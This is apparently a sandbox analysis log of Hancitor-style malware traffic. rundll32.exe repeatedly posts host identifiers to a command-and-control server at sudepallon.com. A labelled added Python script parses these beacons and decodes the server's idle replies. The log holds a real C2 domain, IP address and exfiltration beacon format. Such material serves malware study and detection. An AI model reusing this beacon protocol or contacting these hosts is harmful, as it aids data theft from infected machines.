                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:52.933099985 CEST | 3184 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKZAPARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               41 | 192.168.2.3 | 49766 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:53.121356964 CEST | 3353 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:53.188827038 CEST | 3354 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMFUNARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               42 | 192.168.2.3 | 49767 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:53.238991022 CEST | 3379 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:53.305377007 CEST | 3384 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKTGPARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               43 | 192.168.2.3 | 49768 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:53.302689075 CEST | 3383 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:53.368937969 CEST | 3384 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQCXJARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               44 | 192.168.2.3 | 49771 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:53.507857084 CEST | 3396 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:53.576268911 CEST | 3404 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHKPSARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               45 | 192.168.2.3 | 49772 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:53.631522894 CEST | 3413 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:53.697138071 CEST | 3422 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cGMNTARRABw==0


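One way to parse and decode the exchange shown in session 45 above, as an added example that is not part of the sandbox report and not Hancitor's own code. The request fields come from the captured POST body; the reply decoding (dechunk, base64-decode, XOR every byte with 0x7A, then pull out `{letter:argument}` tokens) is the scheme public Hancitor write-ups describe, which the report itself does not state. The sample request and reply are constructed from session 45, with the report's anonymised `computer\user` value, and the function and constant names are this example's own.

```python
# Added example (not from the Joe Sandbox report, not Hancitor's code): parse a
# Hancitor check-in POST as captured above and decode the C2 reply. The reply
# decoding (base64, XOR 0x7A, "{letter:argument}" tokens) follows public
# Hancitor write-ups; the report only shows the raw bytes.
import base64
import re
from urllib.parse import parse_qs

HANCITOR_XOR_KEY = 0x7A          # documented Hancitor reply key (assumption here)
BEACON_KEYS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
HANCITOR_UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64; "
               "Trident/7.0; rv:11.0) like Gecko")
CMD_RE = re.compile(rb"\{([a-z]):([^}]*)\}")

# Constructed from session 45 in the report. INFO carries the report's
# anonymised "computer\user", so the body is shorter than the captured 121
# bytes; the parser below does not rely on Content-Length.
SAMPLE_REQUEST = (
    b"POST /8/forum.php HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: " + HANCITOR_UA.encode() + b"\r\n"
    b"Host: sudepallon.com\r\n"
    b"Content-Length: 121\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\\user"
    b"&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)"
)
# The reply body exactly as the Data Raw hex shows it: a 12-byte chunk holding
# the base64 text, then the terminating zero-length chunk.
SAMPLE_REPLY_BODY = b"c\r\nHKPSARRABw==\r\n0\r\n\r\n"


def split_http(raw):
    """Return (request/status line, {lower-case header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body


def parse_beacon(raw_request):
    """Return the check-in fields, or None when the request does not have the
    Hancitor beacon shape: POST to a .php path, the hard-coded IE11 UA, and
    exactly the GUID/BUILD/INFO/EXT/IP/TYPE/WIN keys in that order."""
    request_line, headers, body = split_http(raw_request)
    method, path, _ = request_line.split(" ", 2)
    if method != "POST" or not path.endswith(".php"):
        return None
    if headers.get("user-agent") != HANCITOR_UA:
        return None
    fields = parse_qs(body.decode(), keep_blank_values=True)
    if tuple(fields) != BEACON_KEYS:
        return None
    return {k: v[0] for k, v in fields.items()}


def dechunk(body):
    """Join the data of a chunked transfer-encoded body (sizes are hex)."""
    out = b""
    rest = body
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            return out
        out += rest[:size]
        rest = rest[size + 2:]   # skip the chunk data and its trailing CRLF


def decode_reply(body):
    """Dechunk, base64-decode and XOR the reply, then return the command tokens
    as (letter, argument) pairs. Bytes before the first token (three
    non-printable bytes in every reply in this report) are ignored."""
    plain = bytes(b ^ HANCITOR_XOR_KEY for b in base64.b64decode(dechunk(body)))
    return [(c.decode(), arg.decode()) for c, arg in CMD_RE.findall(plain)]


def os_claim_mismatch(raw_request):
    """True when the User-Agent claims Windows 7 (NT 6.1) while the beacon's
    WIN field reports another version; the UA is hard-coded in the bot, so
    this contradiction is a cheap corroborating signal."""
    _, headers, _ = split_http(raw_request)
    fields = parse_beacon(raw_request)
    if fields is None:
        return False
    return ("Windows NT 6.1" in headers.get("user-agent", "")
            and not fields["WIN"].startswith("6.1"))


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_REQUEST))
    print(decode_reply(SAMPLE_REPLY_BODY), os_claim_mismatch(SAMPLE_REQUEST))
```

Run on the session-45 reply, the decoder yields a single `{n:}` token, which public Hancitor descriptions treat as the idle, no-task reply; that matches the bot polling every few hundred milliseconds here and never being handed anything. Every reply in this report ends in the same `ARRABw==` suffix, which is exactly the XOR-encoded `{n:}` sitting on a 3-byte boundary, so only the three prefix bytes (the first four base64 characters) change between responses. The UA string claims Windows NT 6.1 while the beacon reports `WIN=10.0(x64)`, which is why the mismatch check fires on this sample.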
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              46 | 192.168.2.3 | 49773 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:53.697603941 CEST | 3422 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.766364098 CEST | 3422 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nBYBYARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              47 | 192.168.2.3 | 49774 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:53.890221119 CEST | 3458 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.956851006 CEST | 3459 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nZBYAARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              48 | 192.168.2.3 | 49775 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.009562016 CEST | 3517 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.075005054 CEST | 3636 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nYCXBARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              49 | 192.168.2.3 | 49776 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.100348949 CEST | 3637 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.169353008 CEST | 3854 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nNCXMARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              5 | 192.168.2.3 | 49724 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:18.968528032 CEST | 668 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:19.036025047 CEST | 669 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:20 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nJAZQARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              50 | 192.168.2.3 | 49777 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.278556108 CEST | 4169 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.345374107 CEST | 4564 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nFKPUARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              51 | 192.168.2.3 | 49778 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.383713961 CEST | 4612 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.450512886 CEST | 4787 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nTAZGARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              52 | 192.168.2.3 | 49779 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.493014097 CEST | 4789 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.566298008 CEST | 5093 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 51 4a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nMQJNARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              53 | 192.168.2.3 | 49780 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.719345093 CEST | 5441 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.785921097 CEST | 5443 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
